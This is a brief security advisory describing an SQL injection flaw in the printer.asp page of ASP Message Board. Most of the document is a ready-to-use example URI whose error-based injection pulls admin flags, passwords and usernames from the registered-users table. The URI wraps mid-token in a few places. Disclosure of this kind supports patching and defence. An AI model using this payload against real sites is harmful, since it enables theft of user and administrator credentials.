ASP Message Board Printer.ASP SQL Injection Vulnerability

ASP Message Board Printer.ASP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))